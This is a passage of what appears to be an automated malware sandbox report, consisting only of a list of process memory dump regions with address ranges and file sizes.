memory/1120-208-0x000000001AC84000-0x000000001AC86000-memory.dmpFilesize
8KB
-
memory/1120-24-0x0000000002570000-0x0000000002571000-memory.dmpFilesize
4KB
-
memory/1120-23-0x000007FEF4E90000-0x000007FEF587C000-memory.dmpFilesize
9.9MB
-
memory/1120-21-0x0000000000000000-mapping.dmp
-
memory/1120-207-0x000000001AC80000-0x000000001AC82000-memory.dmpFilesize
8KB
-
memory/1120-210-0x000000001C3C0000-0x000000001C3C1000-memory.dmpFilesize
4KB
-
memory/1120-22-0x000007FEFBA01000-0x000007FEFBA03000-memory.dmpFilesize
8KB
-
memory/1120-27-0x000000001AC80000-0x000000001AC82000-memory.dmpFilesize
8KB
-
memory/1120-203-0x000007FEF4B50000-0x000007FEF553C000-memory.dmpFilesize
9.9MB
-
memory/1120-26-0x0000000002620000-0x0000000002621000-memory.dmpFilesize
4KB
-
memory/1120-30-0x000000001AB50000-0x000000001AB51000-memory.dmpFilesize
4KB
-
memory/1120-28-0x000000001AC84000-0x000000001AC86000-memory.dmpFilesize
8KB
-
memory/1120-29-0x00000000026D0000-0x00000000026D1000-memory.dmpFilesize
4KB
-
memory/1120-25-0x000000001AD00000-0x000000001AD01000-memory.dmpFilesize
4KB
-
memory/1172-141-0x0000000000000000-mapping.dmp
-
memory/1172-7-0x0000000000000000-mapping.dmp
-
memory/1272-16-0x0000000000000000-mapping.dmp
-
memory/1272-220-0x00000000FFC81000-0x00000000FFC83000-memory.dmpFilesize
8KB
-
memory/1300-86-0x0000000000000000-mapping.dmp
-
memory/1304-62-0x000007FEF7810000-0x000007FEF7A8A000-memory.dmpFilesize
2.5MB
-
memory/1320-103-0x0000000000000000-mapping.dmp
-
memory/1340-3-0x0000000000000000-mapping.dmp
-
memory/1344-143-0x0000000000000000-mapping.dmp
-
memory/1348-145-0x0000000000000000-mapping.dmp
-
memory/1352-117-0x0000000000000000-mapping.dmp
-
memory/1380-155-0x0000000000000000-mapping.dmp
-
memory/1396-151-0x0000000000000000-mapping.dmp
-
memory/1408-113-0x0000000000000000-mapping.dmp
-
memory/1448-18-0x0000000000000000-mapping.dmp
-
memory/1448-93-0x0000000000000000-mapping.dmp
-
memory/1500-180-0x000000001B6C0000-0x000000001B6C1000-memory.dmpFilesize
4KB
-
memory/1500-178-0x000000001AAA4000-0x000000001AAA6000-memory.dmpFilesize
8KB
-
memory/1500-147-0x0000000000000000-mapping.dmp
-
memory/1500-177-0x000000001AAA0000-0x000000001AAA2000-memory.dmpFilesize
8KB
-
memory/1500-173-0x000007FEF4BF0000-0x000007FEF55DC000-memory.dmpFilesize
9.9MB
-
memory/1560-157-0x0000000000000000-mapping.dmp
-
memory/1560-5-0x0000000000000000-mapping.dmp
-
memory/1604-135-0x0000000000000000-mapping.dmp
-
memory/1604-190-0x00000000FFEB1000-0x00000000FFEB3000-memory.dmpFilesize
8KB
-
memory/1616-115-0x0000000000000000-mapping.dmp
-
memory/1652-87-0x0000000000000000-mapping.dmp
-
memory/1668-52-0x000007FEF42A0000-0x000007FEF4C8C000-memory.dmpFilesize
9.9MB
-
memory/1668-59-0x000000001C1F0000-0x000000001C1F1000-memory.dmpFilesize
4KB
-
memory/1668-48-0x0000000000000000-mapping.dmp
-
memory/1668-56-0x000000001ACE4000-0x000000001ACE6000-memory.dmpFilesize
8KB
-
memory/1668-55-0x000000001ACE0000-0x000000001ACE2000-memory.dmpFilesize
8KB
-
memory/1716-153-0x0000000000000000-mapping.dmp
-
memory/1732-91-0x0000000000000000-mapping.dmp
-
memory/1732-34-0x0000000000000000-mapping.dmp
-
memory/1732-10-0x0000000000000000-mapping.dmp
-
memory/1832-12-0x0000000000000000-mapping.dmp
-
memory/1832-119-0x0000000000000000-mapping.dmp
-
memory/1840-8-0x0000000000000000-mapping.dmp
-
memory/1840-121-0x0000000000000000-mapping.dmp
-
memory/1860-11-0x0000000000000000-mapping.dmp
-
memory/1864-2-0x00000000760B1000-0x00000000760B3000-memory.dmpFilesize
8KB
-
memory/1868-111-0x0000000000000000-mapping.dmp
-
memory/1868-222-0x000007FEF4B50000-0x000007FEF553C000-memory.dmpFilesize
9.9MB
-
memory/1868-225-0x000000001ACD0000-0x000000001ACD2000-memory.dmpFilesize
8KB
-
memory/1868-226-0x000000001ACD4000-0x000000001ACD6000-memory.dmpFilesize
8KB
-
memory/1876-137-0x0000000000000000-mapping.dmp
-
memory/1884-133-0x0000000000000000-mapping.dmp
-
memory/1984-9-0x0000000000000000-mapping.dmp
-
memory/1984-109-0x0000000000000000-mapping.dmp
-
memory/2004-95-0x0000000000000000-mapping.dmp
-
memory/2008-107-0x0000000000000000-mapping.dmp
-
memory/2016-31-0x0000000000000000-mapping.dmp
-
memory/2016-101-0x0000000000000000-mapping.dmp